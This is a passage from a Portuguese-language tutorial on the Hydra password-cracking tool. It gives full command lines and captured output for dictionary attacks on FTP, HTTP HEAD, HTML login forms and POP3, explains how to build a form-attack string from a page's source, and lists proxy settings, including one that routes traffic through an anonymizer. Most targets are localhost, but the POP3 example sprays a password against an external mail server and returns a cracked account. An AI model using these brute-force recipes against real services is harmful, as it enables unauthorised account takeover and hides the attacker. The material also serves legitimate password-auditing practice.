[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1   login: root   password: chaw123
[STATUS] attack finished for localhost (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-08-17 21:24:34
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

*[21][ftp] host: 127.0.0.1   login: root   password: chaw123 -> Esta saída mostra que foi encontrado a senha:chaw123
pertencente ao usuário root.

Exemplo (2) http-head
===================================================================================
Sintaxe:
———————————————————————————–
hydra -L users.txt -P pass.txt -o saida.txt localhost http-head /xampp/
———————————————————————————–

Saida:
///////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:40:56
[DATA] 16 tasks, 1 servers, 266 login tries (l:14/p:19), ~16 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 127.0.0.1   login: root   password: Est2yu
[STATUS] attack finished for localhost (waiting for childs to finish)
select: Bad file descriptor
Hydra (http://www.thc.org) finished at 2010-01-28 00:41:00
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

O Hydra encontrou usuario:root||senha:Est2yu e fez o favor de salvar no arquivo ‘saida.txt’.

Dentro do arquivo foi escrito as seguintes linhas pelo programa:
———————————————————————————–
# Hydra v5.4 run at 2010-01-27 19:59:59 on localhost http-head (hydra -L users.txt -P
pass.txt -o saida.txt localhost http-head)
[80][www] host: 127.0.0.1   login: root password: Est2yu
———————————————————————————–
/xammp/ é o caminho/path -> http://localhost/xammp/

Exemplo (3) http-post-form
===================================================================================
Sintaxe:
———————————————————————————–
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1
http-post-form “index.php:nome=^USER^&senha=^PASS^:<title>invalido</title>”
———————————————————————————–

Saida:
///////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-27 23:19:33
[DATA] 1 tasks, 1 servers, 19 login tries (l:1/p:19), ~19 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: admin
[STATUS] attack finished for 127.0.0.1 (valid pair found)
Hydra (http://www.thc.org) finished at 2010-01-27 23:19:33
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

-> Para criar esta sintaxe tive que olhar o código da pagina >>
———————————————————————————–
<form action=”index.php” method=”POST”>
<input type=”text” name=”nome” /><BR><br>
<input type=”password” name=”senha” /><br><br>
<input type=”submit” name=”boo” value=”Enviar”>
<br>
</form>
———————————————————————————–

__________________________________________________________
|__Mozilla Firefox___________________________________|-|_|X|
|                                                          |
|                                                          |
|                                                          |
|                                                          |
|           _____________________________________          |
|          |               nome                  |         |
|          |_____________________________________|         |
|           _____________________________________          |
|          |               senha                 |         |
|          |_____________________________________|         |
|                                                          |
|                     ________________                     |
|                    |     Enviar     |                    |
|                    |________________|                    |
|                                                          |
|__________________________________________________________|
|_Concluído________________________________________________|

-> POST index.php nome=^USER^&senha=^PASS^&boo=Enviar
-> Use o complemento ‘live HTTP headers’ para Firefox que com toda certeza facilitara bastante sua vida.
-> Quando envio dados errados a pagina me retorna ‘invalido’ no titulo.
———————————————————————————–
<title>invalido</title>
———————————————————————————–

Complete ->
———————————————————————————–
hydra -l [usuário] -P [lista-senhas] -o saida.txt -t 1 -f [host] http-post-form
“[destino]:[nome_da_variável]=^USER^&[nome_da_variável]=^PASS^:[frase de erro]”
———————————————————————————–

Completo ->
———————————————————————————–
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1 http-post-form “index.php:nome=^USER^&senha=^PASS^:<title>invalido</title>”
———————————————————————————–

Sendo que ^USER^ e ^PASS^ sera completado pelo hydra durante o loop que ele vai fazer testando senha por senha.
-> ^USER^ = admin e ^PASS^ = $_ <-

Outro exemplo -> http://localhost/login/login.html
-> Codigo fonte da pagina >>
———————————————————————————–
<form action=”login_vai.php” method=”post”><br>
Login: <input type=”text” name=”login”><br>
Senha: <input type=”password” name=”senha”><br>
<input type=”submit” value=”OK!”>
</form>
———————————————————————————–

Sintaxe:
———————————————————————————–
hydra -l admin -P pass.txt localhost http-post-form “/login/login_vai.php:login=^USER^&senha=^PASS^:Senha inválida!”
———————————————————————————–

Saida:
///////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-04-11 00:31:02
[DATA] 1 tasks, 1 servers, 11 login tries (l:1/p:11), ~11 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1   login: admin   password: teste
[STATUS] attack finished for localhost (valid pair found)
Hydra (http://www.thc.org) finished at 2010-04-11 00:31:07
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Exemplo (4) POP3
===================================================================================
Sintaxe:
———————————————————————————–
hydra -L users.txt -p 123456 -S pop3.xxx.com pop3
———————————————————————————–

Saida:
///////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
[DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
[110][pop3] host: pop3.xxx.com   login: xxxxxx@xx.com.br password: 123456
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

===================================================================================
[0x04] Proxy:
===================================================================================

Proxy web:
———————————————————————————–
HYDRA_PROXY_HTTP=”http://123.45.67.89:8080/”
———————————————————————————–

Para qualquer outro use : HYDRA_PROXY_CONNECT
———————————————————————————–
HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
———————————————————————————–

Com autentificação :
———————————————————————————–
HYDRA_PROXY_AUTH=”nome:senha”
———————————————————————————–